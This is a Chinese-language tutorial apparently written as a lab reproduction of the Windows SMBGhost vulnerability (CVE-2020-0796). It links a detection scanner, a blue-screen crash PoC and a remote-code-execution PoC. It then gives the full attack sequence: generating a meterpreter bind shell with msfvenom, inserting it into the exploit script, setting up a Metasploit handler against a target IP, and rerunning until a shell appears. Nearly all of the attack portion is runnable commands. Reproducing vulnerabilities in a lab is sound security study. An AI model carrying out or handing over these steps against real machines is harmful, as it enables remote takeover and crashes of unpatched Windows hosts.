前言:
這個windows的永恆之黑漏洞,不得不復現一下啦!
這個漏洞諸多大佬都已經復現了,現在跟隨大佬的腳步,逐個復現一下:
可參考:https://www.adminxe.com/1220.html
下面是漏洞復現:
檢測poc:
使用奇安信的檢測工具,檢測得比較准確
http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

藍屏exp:
https://github.com/insightglacier/SMBGhost_Crash_Poc/blob/master/gistfile1.py
該插件需要安裝impactet.git
git clone https://github.com/SecureAuthCorp/impacket.git cd impacket sudo python3 setup.py install
流程:


遠程代碼執行exp:
https://github.com/chompie1337/SMBGhost_RCE_PoC
流程:
首先,在kali中執行:
msfvenom -p windows/x64/meterpreter/bind_tcp lport=7777 -f py -o exp.py
然后會生成一個exp.py
打開exp.py,把其中的內容全部復制,粘貼到exploit.py中的USER_PAYLOAD區域中去,注意,把buf替換成USER_PAYLOAD,保存

在kali中打開msfconsole,進行監聽:
use exploit/multi/handler set payload windows/x64/meterpreter/bind_tcp set lport 7777 set rhost 192.168.28.192 (目標ip) run

運行exploit.py腳本:
python3 exploit.py -ip 192.168.28.192
該腳本雖說是遠程代碼執行腳本,但有可能導致目標ip死機,藍屏,重啟等后果。也有可能目標主機不受到任何影響。
如果出現physical read primitive failed,則多次嘗試執行exploit.py幾次,就會成功了,這個exp是有一定概率的。

在msfconsole中,看到有shell出現:

如果沒反應,則使用Ctrl+C中斷連接,再次run一次。
